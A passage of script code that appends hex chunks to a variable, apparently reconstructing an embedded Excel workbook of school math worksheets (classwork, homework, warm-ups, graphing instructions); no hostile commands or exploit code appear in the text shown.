4000000000000000"\r\nwD+="0002000000095110000021c00000d00020001000c00020064000f0002000100110002000000"\r\nwD+="10000800fca9f1d24d62503f5f00020001002a00020000002b0002000000820002000100800"\r\nwD+="008000000000000000000250204000000ff0081000200c10414000000150000008300020000"\r\nwD+="00840002000000a10022000000ff00010001000100040000000000000000000000e03f00000"\r\nwD+="0000000e03f0000120002000100dd00020001006300020001005500020008007d000c000000"\r\nwD+="0000db1f0f00020004007d000c0001000100b60d0f00020004007d000c000300030049030f0"\r\nwD+="0020004007d000c0004000400b60d0f00060004009d000200010000020e0000000000200000"\r\nwD+="0000000900000008021000000000000900ff000000000000010f0008021000010000000900f"\r\nwD+="f000000000000010f0008021000020000000900ff000000000000010f000802100003000000"\r\nwD+="0900ff000000000000010f0008021000040000000900ff000000000000010f0008021000050"\r\nwD+="000000900ff000000000000010f0008021000060000000900ff000000000000010f00080210"\r\nwD+="00070000000900ff000000000000010f0008021000080000000900ff000000000000010f000"\r\nwD+="8021000090000000900ff000000000000010f00080210000a0000000900ff00000000000001"\r\nwD+="0f00080210000b0000000900ff000000000000010f00080210000c0000000900ff000000000"\r\nwD+="000010f00080210000d0000000900ff000000000000010f00080210000e0000000900ff0000"\r\nwD+="00000000010f00080210000f0000000900ff000000000000010f0008021000100000000900f"\r\nwD+="f000000000000010f0008021000110000000900ff000000000000010f000802100012000000"\r\nwD+="0900ff000000000000010f0008021000130000000900ff000000000000010f0008021000140"\r\nwD+="000000900ff000000000000010f0008021000150000000900ff000000000000010f00080210"\r\nwD+="00160000000900ff000000000000010f0008021000170000000900ff000000000000010f000"\r\nwD+="8021000180000000900ff000000000000010f0008021000190000000900ff00000000000001"\r\nwD+="0f00080210001a0000000900ff000000000000010f00080210001b0000000900ff000000000"\r\nwD+="000010f00080210001c0000000900ff000000000000010f00080210001d0000000900ff0000"\r\nwD+="00000000010f00080210001e0000000900ff000000000000010f00080210001f0000000900f"\r\nwD+="f000000000000010f00fd000a00000004001a0033000000fd000a00000005001a0034000000"\r\nwD+="fd000a00010000000f0000000000fd000a00010001000f0001000000fd000a00010002000f0"\r\nwD+="002000000fd000a00010004001a0024000000fd000a00010005001a0025000000fd000a0001"\r\nwD+="0006001a0026000000fd000a00010007001a0027000000fd000a00010008001a0028000000f"\r\nwD+="d000a00020000000f0021000000fd000a00020001000f00220000007e020a00020002000f00"\r\nwD+="000059400600290002000400230000000000000024400000020007ff130024020002c042010"\r\nwD+="5001f9a9999999999b93f05bd001200020005001b00000028401b0000003440060006003800"\r\nwD+="020007001b000000000000002b400000020008ff220024050002c024090002c0240b0002c02"\r\nwD+="41d0002c0420405001f9a9999999999c93f0506003d00020008001b006766666666662c4000"\r\nwD+="00070004ff270024080002c0240a0002c024110002c0241a0002c0241b0002c0420505001f9"\r\nwD+="a9999999999c93f05fd000a00030000000f0003000000fd000a00030001000f00090000007e"\r\nwD+="020a00030002000f0000005940fd000a00040000000f0004000000fd000a00040001000f000"\r\nwD+="a0000007e020a00040002000f0000005940fd000a00050000000f0005000000fd000a000500"\r\nwD+="01000f000b0000007e020a00050002000f0000004940fd000a00060000000f0006000000fd0"\r\nwD+="00a00060001000f00090000007e020a00060002000f0000c05040fd000a00060004001c0029"\r\nwD+="000000fd000a00070000000f0007000000fd000a00070001000f00090000007e020a0007000"\r\nwD+="2000f000000444006003300070004001d00cdcccccccc6c51400000580337fd1d0044020004"\r\nwD+="c044020005c00344020006c00344020007c00344020008c003fd000a00080000000f0008000"\r\nwD+="000fd000a00080001000f000c0000007e020a00080002000f0000004940fd000a0009000000"\r\nwD+="0f000d000000fd000a00090001000f000b0000007e020a00090002000f0000005440fd000a0"\r\nwD+="00a0000000f000e000000fd000a000a0001000f000c0000007e020a000a0002000f00008051"\r\nwD+="40fd000a000b0000000f0011000000fd000a000b0001000f000b0000007e020a000b0002000"\r\nwD+="f0000005940fd000a000c0000000f000f000000fd000a000c0001000f00090000007e020a00"\r\nwD+="0c0002000f0000005940fd000a000d0000000f0023000000fd000a000d0001000f000a00000"\r\nwD+="07e020a000d0002000f0000003440fd000a000e0000000f0010000000fd000a000e0001000f"\r\nwD+="000a0000007e020a000e0002000f0000004940fd000a000f0000000f0012000000fd000a000"\r\nwD+="f0001000f000a0000007e020a000f0002000f0000004940fd000a000f000400180035000000"\r\nwD+="fd000a000f000500180036000000fd000a000f000600180034000000fd000a00100000000f0"\r\nwD+="013000000fd000a00100001000f000a0000007e020a00100002000f0000003440fd000a0010"\r\nwD+="000400180024000000fd000a0010000500180025000000fd000a0010000600180026000000f"\r\nwD+="d000a0010000700180037000000fd000a0010000800180028000000fd000a00110000000f00"\r\nwD+="14000000fd000a00110001000f000c0000007e020a00110002000f0000c0524006001f00110"\r\nwD+="00400240000000000000059400000020004ff090024020002c042010500bd00120011000500"\r\nwD+="190000004f40190000005140060006002e001100070019000000000000e050400000110004f"\r\nwD+="f180024050002c024090002c0240b0002c0241d0002c0420405000600330011000800180000"\r\nwD+="00000000c051400000110007fe1d0024080002c0240a0002c024110002c0241a0002c0241b0"\r\nwD+="002c042050500fd000a00120000000f0015000000fd000a00120001000f00090000007e020a"\r\nwD+="00120002000f0000005940fd000a00130000000f0016000000fd000a00130001000f0009000"\r\nwD+="0007e020a00130002000f0000000000fd000a00140000000f0017000000fd000a0014000100"\r\nwD+="0f00090000007e020a00140002000f0000000000fd000a00150000000f0018000000fd000a0"\r\nwD+="0150001000f000a0000007e020a00150002000f0000005940fd000a00160000000f00190000"\r\nwD+="00fd000a00160001000f000a0000007e020a00160002000f0000005440fd000a00170000000"\r\nwD+="f001a000000fd000a00170001000f00090000007e020a00170002000f0000005940fd000a00"\r\nwD+="180000000f001b000000fd000a00180001000f00090000007e020a00180002000f000000000"\r\nwD+="0fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a00190002000f"\r\nwD+="0000000000fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e020a001"\r\nwD+="a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c000000"\r\nwD+="7e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c0001000f0"\r\nwD+="0090000007e020a001c0002000f0000005940fd000a001d0000000f001f000000fd000a001d"\r\nwD+="0001000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f0020000000f"\r\nwD+="d000a001e0001000f00090000007e020a001e0002000f0000005940fd000a001f0000000f00"\r\nwD+="1e000000fd000a001f0001000f000a0000007e020a001f0002000f0000805640d70044000f0"\r\nwD+="a00006c021c007000ea002a002a002a00380061002a002a002a002a002a002a002a00540070"\r\nwD+="00cc002a002a002a002a002a002a002a002a002a002a002a002a002a00c20118000e0007000"\r\nwD+="6000904040000801100110001000907080007feec00aa000f0002f038030000100008f00800"\r\nwD+="0000060000000a1400000f0003f0f80200000f0004f028000000010009f0100000000000000"\r\nwD+="000000000000000000000000002000af00800000000140000050000000f0004f05200000092"\r\nwD+="0c0af00800000001140000000a000043000bf0180000007f0004010401bf0008000800ff010"\r\nwD+="0000800bf0300000200000010f0120000000100010000000100000002000000020000000000"\r\nwD+="11f0000000005d0046001500120014000100012100000000dc089201000000000c001400000"\r\nwD+="0000000000000000001000b000000100000001300ee1f00000b000400010300000200140057"\r\nwD+="0000000000ec0078000f0004f078000000f2030af00800000004140000000a000093000bf03"\r\nwD+="60000008000503236018500010000008b0002000000bf0008000a0047014f05000048012660"\r\nwD+="0000810141000008c001400000087f0300000c00000010f0120000000000000077000200d30"\r\nwD+="0000008030c00f100000011f0000000005d001a00150012001e000400116050323601a80992"\r\nwD+="010000000000000000ec00080000000df000000000b60112001202000000000000000068001"\r\nwD+="000000000003c00690000456e74657220796f7572206e6577207461736b7320686572652e20"\r\nwD+="20596f75206d617920757365207468697320736865657420746f2068656c7020796f752e202"\r\nwD+="04f70656e207468697320646f63756d656e7420616e64206368616e67652074686520696e66"\r\nwD+="6f2e3c001000000000006c0211006800000000000000ec0078000f0004f078000000e2030af"\r\nwD+="00800000005140000000a000093000bf0360000008000a03236018500010000008b00020000"\r\nwD+="00bf0008000a00470155b5ffff480119d5ffff810141000008c001400000087f0300000c000"\r\nwD+="00010f01200000000000600d001040088000800e00008000000000011f0000000005d001a00"\r\nwD+="150012001e0005001160a0323601e40a92010000000000000000ec00080000000df00000000"\r\nwD+="0b60112001202000000000000000029001000000000003c002a0000436c69636b2074686520"\r\nwD+="63656c6c20616e6420636865636b206f75742074686520666f726d756c612e3c00100000000"\r\nwD+="000e90011002900000000000000ec006c000f0004f06c000000c2000af00800000006140000"\r\nwD+="000a000073000bf02a0000008000f03236018500010000008b0002000000bf0008000a00810"\r\nwD+="10d000008bf0110001000c00140000008000010f012000000000004008b001300d3000800b0"\r\nwD+="0120005a00000011f0000000005d001a00150012001e0006001160f0323601d80b920100000"\r\nwD+="00000000000ec00080000000df000000000b6011200120200000000000000003e0010000000"\r\nwD+="00003c003f0000496e7365727420746865206772617068206f6620746869732064617461206"\r\nwD+="f6e2061206e65772073686565742e202053656520646972656374696f6e732e3c0010000000"\r\nwD+="00005d0111003e00000000000000ec00fa000f0004f0f200000002000af0080000000a14000"\r\nwD+="0000a0000b3000bf0b8000000bf000800080042011e01000043013a00000044010400000045"\r\nwD+="c14c00000046c1240000007f0101000100810141000008bf0100001000c00140000008ff011"\r\nwD+="000100013001300f0ff000000000c001a00180034002d003500420036006e000b007c000700"\r\nwD+="8a0003007a001f0080001f0086001f008f0002009e000600ad000a00c6003a00db003a00f00"\r\nwD+="03a0014010e001e0106000f0010000200004000ad012000ad012000ad012000ad012000ad01"\r\nwD+="2000ad012000ac0080000010f012000000000004000b0012005a00080050031500c40000001"\r\nwD+="1f0000000005d001a00150012001e000a00116000000000bc0c92010000000000000000ec00"\r\nwD+="28002f0005f020000000000017f0080000000200000004140000000017f0080000000400000"\r\nwD+="0051400003e021200b606000000004000000000000000000000001d000f0003020004000000"\r\nwD+="0100020002000404ef00060005003700000067081700670800000000000000000000020001f"\r\nwD+="fffffff004000000a0000000908100000061000e228cd07c9c00000060200000b0218000000"\r\nwD+="000001000000290000000c230000cb2f00002f3000000d00020001000c00020064000f00020"\r\nwD+="0010011000200000010000800fca9f1d24d62503f5f00020001002a00020000002b00020000"\r\nwD+="00820002000100800008000000000000000000250204000000ff0081000200c104140000001"\r\nwD+="5000000830002000000840002000000a10022000000ff000100010001000400020001ff0000"\r\nwD+="00000000e03f000000000000e03f0400120002000100dd00020001006300020001005500020"\r\nwD+="008007d000c0000000000b6170f00020004007d000c0001000100920f0f00020004007d000c"\r\nwD+="0008000800db0b0f00060004007d000c000d000d00b60a0f00060004009b0000009d0002000"\r\nwD+="1009e00220000000400060218433601090100000000000000000000000000636c617373776f"\r\nwD+="726b00020e00010000002900000000000e00000008021000010000000a00ff0000000000000"\r\nwD+="10f0008021000020000000a00ff000000000020010f0008021000030000000a00ff00000000"\r\nwD+="0020010f0008021000040000000a00ff000000000000010f0008021000050000000a00ff000"\r\nwD+="000000020010f0008021000060000000a00ff000000000020010f0008021000070000000a00"\r\nwD+="ff000000000020010f0008021000080000000a00ff000000000020010f00080210000900000"\r\nwD+="00a00ff000000000020010f00080210000a0000000a00ff000000000020010f00080210000b"\r\nwD+="0000000a00ff000000000020010f00080210000c0000000a00ff000000000020010f0008021"\r\nwD+="0000d0000000a00ff000000000000010f00080210000e0000000a00ff000000000000010f00"\r\nwD+="080210000f0000000a00ff000000000000010f0008021000100000000800ff0000000000000"\r\nwD+="10f0008021000110000000800ff000000000020010f0008021000120000000800ff00000000"\r\nwD+="0020010f0008021000130000000800ff000000000020010f0008021000140000000800ff000"\r\nwD+="000000020010f0008021000150000000800ff000000000000010f0008021000160000000800"\r\nwD+="ff000000000000010f0008021000170000000800ff000000000020010f00080210001800000"\r\nwD+="00800ff000000000020010f0008021000190000000800ff000000000000010f00080210001a"\r\nwD+="0000000800ff000000000020010f00080210001b0000000800ff000000000020010f0008021"\r\nwD+="0001c0000000800ff000000000020010f00080210001d0000000800ff000000000020010f00"\r\nwD+="080210001e0000000800ff000000000020010f00080210001f0000000800ff0000000000000"\r\nwD+="10f00fd000a00010000000f0000000000fd000a00010001000f0001000000fd000a00010002"\r\nwD+="000f0002000000fd000a00010003000f004b000000fd000a00010004000f0047000000fd000"\r\nwD+="a00010005000f0048000000fd000a00010006000f0049000000fd000a00010007000f004a00"\r\nwD+="0000fd000a00010008000f0029000000fd000a00020000000f0021000000fd000a000200010"\r\nwD+="00f00220000007e020a00020002000f000000594003020e0002000800170014b742712b1451"\r\nwD+="4003020e0002000900170014b742712b145140fd000a00030000000f0003000000fd000a000"\r\nwD+="30001000f00090000007e020a00030002000f0000005940fd000a00030008000f0029000000"\r\nwD+="fd000a00030009000f0029000000fd000a00040000000f0004000000fd000a00040001000f0"\r\nwD+="00a0000007e020a0004000200250000004b40060047000400030025000000000000004b4020"\r\nwD+="001f0007fe310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02"\r\nwD+="4160002c024190002c0241f0002c04209e300060047000400040026009ff4499ff4494c4020"\r\nwD+="00040006ff310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02"\r\nwD+="4160002c024190002c0241f0002c04209050006004700040005002500f46ae259d16c954020"\r\nwD+="000f0008ff310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02"\r\nwD+="4160002c024190002c0241f0002c042092e000600470004000600250055db59c2cf83424020"\r\nwD+="00040007ff310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02"\r\nwD+="4160002c024190002c0241f0002c042090c000600280004000700250047c9462533d2b1bf20"\r\nwD+="00040005ff120044040002c044040004c0041544040006c0067e020a0004000800170000805"\r\nwD+="14001020600040009001700fd000a00050000000f0005000000fd000a00050001000f000b00"\r\nwD+="00007e020a00050002000f0000004940fd000a00060000000f0006000000fd000a000600010"\r\nwD+="00f00090000007e020a00060002000f0000c05040fd000a00070000000f0007000000fd000a"\r\nwD+="00070001000f00090000007e020a00070002000f0000004440fd000a00080000000f0008000"\r\nwD+="000fd000a00080001000f000c0000007e020a00080002000f0000004940fd000a0009000000"\r\nwD+="0f000d000000fd000a00090001000f000b0000007e020a00090002000f0000005440fd000a0"\r\nwD+="00a0000000f000e000000fd000a000a0001000f000c0000007e020a000a0002000f00008051"\r\nwD+="40fd000a000b0000000f0011000000fd000a000b0001000f000b0000007e020a000b0002000"\r\nwD+="f0000005940fd000a000c0000000f000f000000fd000a000c0001000f00090000007e020a00"\r\nwD+="0c0002000f0000005940fd000a000d0000000f0023000000fd000a000d0001000f000a00000"\r\nwD+="07e020a000d0002000f00000034407e020a000d0004000f0000004f4003020e000d0006000f"\r\nwD+="0043e7357689da4340060028000d0007000f00410b953b80ecf0bf0000040004ff1200440d0"\r\nwD+="002c0440d0004c00415440d0006c006fd000a000e0000000f0010000000fd000a000e000100"\r\nwD+="0f000a0000007e020a000e0002000f00000049407e020a000e0004000f0000004f4003020e0"\r\nwD+="00e0006000f0043e7357689da4340060028000e0007000f00937af3fa6d57d3bf00000d0007"\r\nwD+="ff1200440e0002c0440e0004c00415440e0006c006fd000a000e0008001e0045000000fd000"\r\nwD+="a000e0009001e002a000000fd000a000f0000000f0012000000fd000a000f0001000f000a00"\r\nwD+="00007e020a000f0002000f000198c2407e020a000f0004000f0000004f4003020e000f00060"\r\nwD+="00f0043e7357689da4340060028000f0007000f00f7cfd0457ac1ea3f00000e0007ff120044"\r\nwD+="0f0002c0440f0004c00415440f0006c006060023000f0008001b00cdcccccccccc284000003"\r\nwD+="00637fd0d001fd7a3703d0ad7e33f1e1400057e020a000f0009001f0000003440fd000a0010"\r\nwD+="0000000f0013000000fd000a00100001000f000a0000007e020a00100002000f00000034407"\r\nwD+="e020a00100004000f0000004f4003020e00100006000f0043e7357689da4340060028001000"\r\nwD+="07000f00410b953b80ecf0bf00000f0007ff120044100002c044100004c0041544100006c00"\r\nwD+="6fd000a00110000000f0014000000fd000a00110001000f000c0000007e020a00110002000f"\r\nwD+="0000c05240fd000a00120000000f0015000000fd000a00120001000f00090000007e020a001"\r\nwD+="20002000f0000005940fd000a00130000000f0016000000fd000a00130001000f0009000000"\r\nwD+="7e020a00130002000f0000000000fd000a00140000000f0017000000fd000a00140001000f0"\r\nwD+="0090000007e020a00140002000f0000000000fd000a00150000000f0018000000fd000a0015"\r\nwD+="0001000f000a0000007e020a00150002000f00000059407e020a00150004000f0000004f400"\r\nwD+="3020e00150006000f0043e7357689da434006002800150007000f0014820178c39fee3f0000"\r\nwD+="100007ff120044150002c044150004c0041544150006c006fd000a00160000000f001900000"\r\nwD+="0fd000a00160001000f000a0000007e020a00160002000f00000054407e020a00160004000f"\r\nwD+="0000004f4003020e00160006000f0043e7357689da434006002800160007000f00dd376df82"\r\nwD+="403dd3f0000150007ff120044160002c044160004c0041544160006c006fd000a0017000000"\r\nwD+="0f001a000000fd000a00170001000f00090000007e020a00170002000f0000005940fd000a0"\r\nwD+="0180000000f001b000000fd000a00180001000f00090000007e020a00180002000f00000000"\r\nwD+="00fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a00190002000"\r\nwD+="f00000000007e020a00190004000f0000004f4003020e00190006000f0043e7357689da4340"\r\nwD+="06002800190007000f00537e7ab998fbf8bf0000160007ff120044190002c044190004c0041"\r\nwD+="544190006c006fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e020a"\r\nwD+="001a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c000"\r\nwD+="0007e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c000100"\r\nwD+="0f00090000007e020a001c0002000f0000005940fd000a001d0000000f001f000000fd000a0"\r\nwD+="01d0001000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f00200000"\r\nwD+="00fd000a001e0001000f00090000007e020a001e0002000f0000005940fd000a001f0000000"\r\nwD+="f001e000000fd000a001f0001000f000a0000007e020a001f0002000f00008056407e020a00"\r\nwD+="1f0004000f0000004f4003020e001f0006000f0043e7357689da4340060028001f0007000f0"\r\nwD+="0010f1cfaaa90e63f0000190007ff1200441f0002c0441f0004c00415441f0006c006d70042"\r\nwD+="00370c000058027e004e0046009a012a002a002a002a002a002a002a002a0076009200ab007"\r\nwD+="6002a002a002a002a00760076002a002a0076002a002a002a002a002a000802100028000d00"\r\nwD+="0e00ff000000000000010f000102060028000d001700d70006001e0000000000c20118001f0"\r\nwD+="00400020009070300010f08000f0005000903080007ffec00aa000f0002f03e020000200008"\r\nwD+="f00800000005000000040400000f0003f00e0200000f0004f028000000010009f0100000000"\r\nwD+="000000000000000000000000000000002000af00800000000040000050000000f0004f05200"\r\nwD+="0000920c0af00800000001040000000a000043000bf0180000007f0004010401bf000800080"\r\nwD+="0ff0100000800bf0300000200000010f0120000000100010000000100000002000000020000"\r\nwD+="00000011f0000000005d00460015001200140001000121000000006c129201000000000c001"\r\nwD+="40000000000000000000000010008000000100000001300ee1f000008000400010300000a00"\r\nwD+="1400570000000000ec0072000f0004f06a000000920c0af00800000002040000000a0000830"\r\nwD+="00bf0300000007f0004010401bf000800080081014e00000883014d000008bf0110001000c0"\r\nwD+="014d000008ff01080008003f0200000200000010f012000000000000004101210000000c00a"\r\nwD+="0023700d300000011f0000000005d001a001500120005000200116000000000381392010000"\r\nwD+="0000000000000908100000062000e228cd07c9c000000602000014000000150000008300020"\r\nwD+="000008400020000004d006a0300004500700073006f006e0020005300740079006c00750073"\r\nwD+="00200043004f004c004f005200200036003000300020004500530043002f005000200032000"\r\nwD+="000000001040005dc008c0243ef800702000100ea0a6f08640001000f006801020001006801"\r\nwD+="020001004c00650074007400650072000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000100000000000000020000000200000001000000300100000000000000000"\r\nwD+="000000000000000000044494e55220000003402580053ab1e3f000000000000000000000000"\r\nwD+="010000000000000000000000000000000800000001000000010000000000020000000400000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000dddd00000000000000000000000000000000000000000000000000000"\r\nwD+="0000000000000000000000580000004f5350454141828202000000000000000100000000000"\r\nwD+="000000000000000000000000000010000000000000004000000000000000000000000000000"\r\nwD+="000000006a0000000000000003000000010000000f000000a10022000100640001000100010"\r\nwD+="0000068016801000000000000e03f000000000000e03f010033000200030060100a00802535"\r\nwD+="16dc000100090060100a008115e60ac80000000a0060100a008115e60ac80001000b0012000"\r\nwD+="2000100011002000000021010000000000000000000d0bfb502e8bf230133100000a0000400"\r\nwD+="0100010064100800000001000000010032100400000002003310000007100c0000000000000"\r\nwD+="0ffff09004d000a101000ffffff0000000000010001004e004d003410000003100c00030001"\r\nwD+="000c000900010000003310000051100f0000020000000007003a0000010002000d100e00000"\r\nwD+="0050147005200410044004500511013000102000000000b003b000002001f00020002005110"\r\nwD+="13000202000000000b003b000002001f000000010051100800030100000000000006100800f"\r\nwD+="fff000000000000331000005f10020000003410000045100200000034100000441004000a00"\r\nwD+="0000241002000200251020000202010000000000eaffffffcbffffff0000000000000000b10"\r\nwD+="04d00103d0000331000004f1014000200020000000000000000000000000000000000261002"\r\nwD+="000a0051100800000100000000000034100000241002000300251020000202010000000000e"\r\nwD+="affffffcbffffff0000000000000000b1004d00103d0000331000004f101400020002000000"\r\nwD+="0000000000000000000000000000261002000b0051100800000100000000000034100000461"\r\nwD+="00200010041101200000062010000e0030000820b000005060000331000004f101400020002"\r\nwD+="002c000000ed020000b90c0000490c00001d101200000000000000000000000000000000000"\r\nwD+="000331000002010080001aaaaaa010001006210120000000000010000000100000000000000"\r\nwD+="ef001e101e000200030100000000000000000000000000000000000000000b004d005a00261"\r\nwD+="002000900341000001d101200010000000000000000000000000000000000331000001f102a"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="00000001f011e101e0002000301000000000000000000000000000000000000000023004d00"\r\nwD+="000021100200010007100c00000000000000ffff09004d00341000003510000032100400000"\r\nwD+="003003310000007100c008080800000000000000017000a101000c0c0c00000000000010000"\r\nwD+="0016004f0034100000141014000000000000000000000000000000000000000000331000001"\r\nwD+="8100200010022100a0000000000000000000f0015101400150d00001a0600007a0200009101"\r\nwD+="000003011f00331000004f10140005000200150d00001a06000000000000000000002510200"\r\nwD+="00202010000000000eaffffffcbffffff0000000000000000b1004d0030090000331000004f"\r\nwD+="101400020002000000000000000000000000000000000051100800000100000000000034100"\r\nwD+="000341000003410000034100000251020000202010000000000a9060000540000004a020000"\r\nwD+="e501000081004d0080300000331000004f101400020002000000000000000000860000002e0"\r\nwD+="00000261002000a005110080000010000000000000d10180000000a0143006c006100730073"\r\nwD+="0077006f0072006b00200027100600010000000000341000003410000000020e00000000000"\r\nwD+="90000000000010000006510020002000402370000000000000017000163006c006100730073"\r\nwD+="0077006f0072006b000a0038002e003600200038002e0037002000730068006500650074000"\r\nwD+="4022f0001000000000013000163006c0061007300730077006f0072006b000a007700610072"\r\nwD+="006d00750070002000230035000402350002000000000016000163006c00610073007300770"\r\nwD+="06f0072006b000a0063006f006f006c00200064006f0077006e0020002300350004023d0003"\r\nwD+="00000000001a000163006c0061007300730077006f0072006b000a007700650065006b006c0"\r\nwD+="07900200072006500760069006500770020003100350004023d000400000000001a00016300"\r\nwD+="6c0061007300730077006f0072006b000a007700650065006b006c007900200072006500760"\r\nwD+="069006500770020003100360004023d000500000000001a000163006c006100730073007700"\r\nwD+="6f0072006b000a007700650065006b006c00790020007200650076006900650077002000310"\r\nwD+="034000402370006000000000017000163006c0061007300730077006f0072006b000a005400"\r\nwD+="72006900670020005400770069007300740065007200200004023d000700000000001a00016"\r\nwD+="3006c0061007300730077006f0072006b000a007700650065006b006c007900200072006500"\r\nwD+="76006900650077002000310037000402350008000000000016000163006c006100730073007"\r\nwD+="7006f0072006b000a006c006f0063007500730020007000610063006b006500740065100200"\r\nwD+="010003020e000000000000000000000000004b4003020e00010000000000000000000000344"\r\nwD+="003020e00020000000000000000000000494003020e00030000000000cdcccccccccc574003"\r\nwD+="020e00040000000000000000000000344003020e00050000000000000000000000594003020"\r\nwD+="e00060000000000000000000000544003020e00070000000000000000000000000003020e00"\r\nwD+="08000000000000000000008056406510020003000a000000ec0066000f0004f066000000a20"\r\nwD+="c0af00800000003040000000a000063000bf0240000008000784a36018b0002000000bf0008"\r\nwD+="000800810141000008c0010c000008ff0108000800000010f01200000000000800d2001600a"\r\nwD+="6000c0010001f00d300000011f0000000005d001a0015001200060003001160784a3601d413"\r\nwD+="92010000000000000000ec00080000000df000000000b601120012020000000000000000260"\r\nwD+="01000000000003c00270000576861742074797065206f66206772617068206c6f6f6b732062"\r\nwD+="65737420616e64207768793f3c00100000001200e90011002600000000000000ec009c000f0"\r\nwD+="004f09c00000002030af00800000004040000000a0000f3000bf05a0000008000c84a360185"\r\nwD+="00010000008b0002000000bf0008000a0047011ca8ffff4801fb340000490125ccffff4a01c"\r\nwD+="60b00004c01c60b00004d011ca8ffff4e01fb340000810141000008c0010c000008ff010800"\r\nwD+="08007f0304000c00000010f01200000000000a0070010100e2000b0070031000f100000011f"\r\nwD+="0000000005d001a00150012001e0004001160c84a3601e01492010000000000000000ec0008"\r\nwD+="0000000df000000000b60112001202000000000000000024001000000000003c00250000225"\r\nwD+="041535445205350454349414c22202d2d56414c55455320414e4420464f524d4154533c0010"\r\nwD+="0000001200120111002400000000000000ec0018001f0005f010000000000017f0080000000"\r\nwD+="2000000040400003e021200b600100000004000000000000000000000001d000f0003040003"\r\nwD+="0000000100040004000303ef000600050037000000670817006708000000000000000000000"\r\nwD+="20001ffffffff004000000a0000000908100000061000e228cd07c9c00000060200000b0218"\r\nwD+="0000000000010000002b0000005b4000007e4d0000004e00000d00020001000c00020064000"\r\nwD+="f000200010011000200000010000800fca9f1d24d62503f5f00020001002a00020000002b00"\r\nwD+="02000000820002000100800008000000000000000000250204000000ff0081000200c104140"\r\nwD+="0000015000000830002000000840002000000a10022000000ff000100010001000400020001"\r\nwD+="ff000000000000e03f000000000000e03f524d120002000100dd00020001006300020001005"\r\nwD+="500020008007d000c0000000000241b0f00020004007d000c00010001006d130f0003000400"\r\nwD+="7d000c0008000800b60a0f00060004009b0000009d00020001009e002100000004000602c85"\r\nwD+="a3601080100000000000000000000000000686f6d65776f726b00020e00010000002b000000"\r\nwD+="00000f00000008021000010000000900ff000000000000010f0008021000020000000900ff0"\r\nwD+="00000000020010f0008021000030000000900ff000000000000010f00080210000400000009"\r\nwD+="00ff000000000020010f0008021000050000000900ff000000000020010f000802100006000"\r\nwD+="0000900ff000000000000010f0008021000070000000900ff000000000000010f0008021000"\r\nwD+="080000000900ff000000000020010f0008021000090000000900ff000000000020010f00080"\r\nwD+="210000a0000000900ff000000000020010f00080210000b0000000900ff000000000020010f"\r\nwD+="00080210000c0000000900ff000000000000010f00080210000d0000000900ff00000000002"\r\nwD+="0010f00080210000e0000000900ff000000000020010f00080210000f0000000900ff000000"\r\nwD+="000020010f0008021000100000000a00ff000000000020010f0008021000110000000a00ff0"\r\nwD+="00000000020010f0008021000120000000a00ff000000000000010f0008021000130000000a"\r\nwD+="00ff000000000000010f0008021000140000000a00ff000000000000010f000802100015000"\r\nwD+="0000a00ff000000000020010f0008021000160000000a00ff000000000020010f0008021000"\r\nwD+="170000000a00ff000000000000010f0008021000180000000a00ff000000000000010f00080"\r\nwD+="21000190000000a00ff000000000020010f00080210001a0000000a00ff000000000020010f"\r\nwD+="00080210001b0000000a00ff000000000020010f00080210001c0000000a00ff00000000000"\r\nwD+="0010f00080210001d0000000a00ff000000000020010f00080210001e0000000a00ff000000"\r\nwD+="000000010f00080210001f0000000a00ff000000000020010f00fd000a00010000000f00000"\r\nwD+="00000fd000a00010001000f0001000000fd000a00010002000f0002000000fd000a00010003"\r\nwD+="000f0047000000fd000a00010004000f0032000000fd000a00010005000f004c000000fd000"\r\nwD+="a00010006000f004d000000fd000a00010007000f004e000000fd000a00020000000f002100"\r\nwD+="0000fd000a00020001000f00220000007e020a00020002000f000000594003020e000200080"\r\nwD+="01700577cc5577cc53240fd000a00030000000f0003000000fd000a00030001000f00090000"\r\nwD+="007e020a00030002000f0000405940060051000300030026003c25c85382fc50400000a8073"\r\nwD+="7fd3b0024030002c024060002c024070002c0240c0002c024120002c024130002c024140002"\r\nwD+="c024170002c024180002c0241c0002c0241e0002c0420b050006005a000300040025009a999"\r\nwD+="99999d953400000130008ff440024030002c024060002c0250600070002c002c024060002c0"\r\nwD+="240c0002c024130002c024120002c024140002c024170002c024180002c0241c0002c0241e0"\r\nwD+="002c0420ce30006005100030005002500a3554c5ac5949f400000030004ff3b0024030002c0"\r\nwD+="24060002c024070002c0240c0002c024120002c024130002c024140002c024170002c024180"\r\nwD+="002c0241c0002c0241e0002c0420b2e000600510003000600250040bc8129957a4640000003"\r\nwD+="0005ff3b0024030002c024060002c024070002c0240c0002c024130002c024120002c024140"\r\nwD+="002c024170002c024180002c0241c0002c0241e0002c0420b0c00060028000300070025008a"\r\nwD+="ddf0a40f87e73f0000030006ff120044030002c044030003c0041544030006